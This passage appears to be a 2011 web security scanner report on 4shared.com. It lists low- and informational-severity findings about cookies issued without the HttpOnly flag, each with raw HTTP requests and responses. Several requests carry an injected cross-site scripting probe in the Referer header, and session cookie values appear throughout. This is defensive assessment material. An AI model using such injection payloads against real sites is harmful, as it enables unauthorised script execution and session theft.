User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/javascript
Content-Length: 1346
Date: Fri, 29 Jul 2011 14:08:22 GMT


function clearLogin(){
var field=document.getElementById('loginfield');
if (field.value=="your e-mail") {
field.value="";
field.className = field.className.replace("fieldhint
...[SNIP]...

6.10. http://www.4shared.com/js/plupload/plupload.flash.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/plupload/plupload.flash.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/plupload/plupload.flash.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:26 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=1152470595; Expires=Mon, 26-Jul-2021 14:05:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:26 GMT
ETag: W/"11860-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 11860
Date: Fri, 29 Jul 2011 14:05:26 GMT

/**
* plupload.flash.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contri
...[SNIP]...

6.11. http://www.4shared.com/js/plupload/plupload.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/plupload/plupload.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/plupload/plupload.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-762786172; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"42158-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 42158
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contributing
...[SNIP]...

6.12. http://www.4shared.com/js/plupload/plupload.silverlight.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/plupload/plupload.silverlight.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/plupload/plupload.silverlight.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-757579128; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"13014-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 13014
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.silverlight.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/
...[SNIP]...

6.13. http://www.4shared.com/js/signup-script.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:14 GMT
Vary: *
Content-Type: text/javascript
Content-Length: 3516
Date: Fri, 29 Jul 2011 14:08:14 GMT


function checkForm(form) {
var form=document.theForm;
if (form.login.value==null || form.login.value.length==0) {
alert ("You did not enter your e-mail address");
form.
...[SNIP]...

6.14. http://www.4shared.com/sla.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /sla.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sla.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 24527
Date: Fri, 29 Jul 2011 14:08:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Service Lev
...[SNIP]...

6.15. http://www.4shared.com/advertise/search/images/300x250.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/search/images/300x250.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise/search/images/300x250.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:01:29 GMT; Path=/
Set-Cookie: hostid=1872608999; Expires=Mon, 26-Jul-2021 14:01:29 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:01:29 GMT
ETag: W/"7736-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: image/gif
Content-Length: 7736
Date: Fri, 29 Jul 2011 14:01:28 GMT

GIF89a,..........................................................................................*;....Zp..........e{..fR|...........c|.......g...2....<T.............<T.....V9Fa.......Xj..............
...[SNIP]...

6.16. http://www.4shared.com/advertise/search/images/468x60.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/search/images/468x60.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise/search/images/468x60.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:01:28 GMT; Path=/
Set-Cookie: hostid=1790242678; Expires=Mon, 26-Jul-2021 14:01:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:01:28 GMT
ETag: W/"6394-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: image/gif
Content-Length: 6394
Date: Fri, 29 Jul 2011 14:01:28 GMT

GIF89a.._........................................................................................e|..cO...|...........d}..........g...2....<T..........<T.....U8......Fa....Wi.........................x
...[SNIP]...

6.17. http://www.4shared.com/advertise/search/images/728x90.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/search/images/728x90.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise/search/images/728x90.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:01:49 GMT; Path=/
Set-Cookie: hostid=-1415456175; Expires=Mon, 26-Jul-2021 14:01:49 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:01:49 GMT
ETag: W/"7502-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: image/gif
Content-Length: 7502
Date: Fri, 29 Jul 2011 14:01:48 GMT

GIF89a..~...........................................................................................<U........dO..................d}..2....t..E`.h.....n.....<T.....U8...............Wi....x............
...[SNIP]...

6.18. http://www.4shared.com/css/common.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:31 GMT; Path=/
Set-Cookie: hostid=1161423513; Expires=Mon, 26-Jul-2021 13:59:31 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:31 GMT
ETag: W/"12973-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: text/css
Content-Length: 12973
Date: Fri, 29 Jul 2011 13:59:30 GMT

body {padding: 0px; background: #FFFFFF; margin:0px;
font-family: Helvetica, Arial, Tahoma, "Trebuchet MS",sans-serif; font-size:12px; color:#585b55}

.back-white {width:830px; margin:auto; backgr
...[SNIP]...

6.19. http://www.4shared.com/css/index.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/index.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/index.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:42 GMT; Path=/
Set-Cookie: hostid=657966881; Expires=Mon, 26-Jul-2021 14:07:42 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:42 GMT
ETag: W/"15771-1295256530000"
Last-Modified: Mon, 17 Jan 2011 09:28:50 GMT
Content-Type: text/css
Content-Length: 15771
Date: Fri, 29 Jul 2011 14:07:42 GMT

body {margin: 0px; padding: 0px; background: #4E4F53; height: 100%;}

img, a:link img, a:visited img {border-style: none}
a img {color: #FFFFFF}

.absmid {vertical-align:middle}

form {margin:0
...[SNIP]...

6.20. http://www.4shared.com/css/lang/style-ms.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/lang/style-ms.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lang/style-ms.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:47 GMT; Path=/
Set-Cookie: hostid=1523296321; Expires=Mon, 26-Jul-2021 14:09:47 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:47 GMT
ETag: W/"77-1305634966000"
Last-Modified: Tue, 17 May 2011 12:22:46 GMT
Content-Type: text/css
Content-Length: 77
Date: Fri, 29 Jul 2011 14:09:47 GMT

/*Bahasa Melayu*/
h1.tagline {width:180px}

.bottom div.awrd {left:335px}

6.21. http://www.4shared.com/css/lang/style-ru.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/lang/style-ru.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lang/style-ru.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:06 GMT; Path=/
Set-Cookie: hostid=1223343799; Expires=Mon, 26-Jul-2021 14:05:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:06 GMT
ETag: W/"231-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: text/css
Content-Length: 231
Date: Fri, 29 Jul 2011 14:05:06 GMT

/*russian*/
h1.tagline {width:205px}

.page_d1 .btnprem, #dAllPopAbtn {font:bold 14px/34px Arial,sans-serif}

#subscribeUnsubscribe {width:76px}

/*FT-80*/
#shareTable #link, #shareTable #ad
...[SNIP]...

6.22. http://www.4shared.com/css/mainWithoutCommon.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:31 GMT; Path=/
Set-Cookie: hostid=-1627894845; Expires=Mon, 26-Jul-2021 13:59:31 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:31 GMT
ETag: W/"8450-1305634966000"
Last-Modified: Tue, 17 May 2011 12:22:46 GMT
Content-Type: text/css
Content-Length: 8450
Date: Fri, 29 Jul 2011 13:59:31 GMT

.head {width:792px}

h2 {font:bold 21px "Trebuchet MS"; color:#1370a0; text-transform:uppercase; margin-top:0px}
h3 {font:bold 16px "Trebuchet MS"; color:#b02b11; text-transform:uppercase;}
h3:first-l
...[SNIP]...

6.23. http://www.4shared.com/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/style.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:28 GMT; Path=/
Set-Cookie: hostid=-473064029; Expires=Mon, 26-Jul-2021 13:59:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:28 GMT
ETag: W/"36317-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: text/css
Content-Length: 36317
Date: Fri, 29 Jul 2011 13:59:28 GMT

body {margin: 0; padding: 0; background: AppWorkspace; height: 100%;font-family:Helvetica,Arial,sans-serif;}
html {height: 100%;}

img, a:link img, a:visited img {border-style: none}
a img {color:
...[SNIP]...

6.24. http://www.4shared.com/desktop/images/scr3_new.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/images/scr3_new.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr3_new.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=-1575612922; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"28458-1295256536000"
Last-Modified: Mon, 17 Jan 2011 09:28:56 GMT
Content-Type: image/gif
Content-Length: 28458
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89a..O...............4..............."8.4.....^6..........g....d................e.~...[...........8......c........................a.S............p|.R.....q.............`f|...........fkR............
...[SNIP]...

6.25. http://www.4shared.com/desktop/images/scr4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/images/scr4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=-1286110689; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"13671-1295256538000"
Last-Modified: Mon, 17 Jan 2011 09:28:58 GMT
Content-Type: image/gif
Content-Length: 13671
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89a..............X.........a.'................S...a..L.....r..^...Y .....`.T....U.................U.......g...H.....h....zyx.-...........T,...n.Gjic........]......lr....YXT..._w.FFC4H...8......(..w
...[SNIP]...

6.26. http://www.4shared.com/desktop/images/scr5.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/images/scr5.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr5.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=-2002651489; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"12805-1295256538000"
Last-Modified: Mon, 17 Jan 2011 09:28:58 GMT
Content-Type: image/gif
Content-Length: 12805
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89aw...............1j..Y..~r...............EEDg{.YYX.0.k...d..........;........lll....E.....U.::9....j............./d.V..!R.....V.}~~......qqrb.BA?.rR..|...(t..U...t.........D.D.........'''.}.|...
...[SNIP]...

6.27. http://www.4shared.com/desktop/images/scr6.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/images/scr6.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktop/images/scr6.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:28 GMT; Path=/
Set-Cookie: hostid=2049103533; Expires=Mon, 26-Jul-2021 14:00:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:28 GMT
ETag: W/"10588-1295256538000"
Last-Modified: Mon, 17 Jan 2011 09:28:58 GMT
Content-Type: image/gif
Content-Length: 10588
Date: Fri, 29 Jul 2011 14:00:27 GMT

GIF89a..............j..Y..........y.....:....c......oR.c..U.ZYS.I.....V.......zyvjhb...Zd.. .*t.<..:95...SRK.......S+}zn......ed].d.MLF....:..............a.............*)&:F.....T...........*.....k..
...[SNIP]...

6.28. http://www.4shared.com/developer/developer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /developer/developer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developer/developer.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
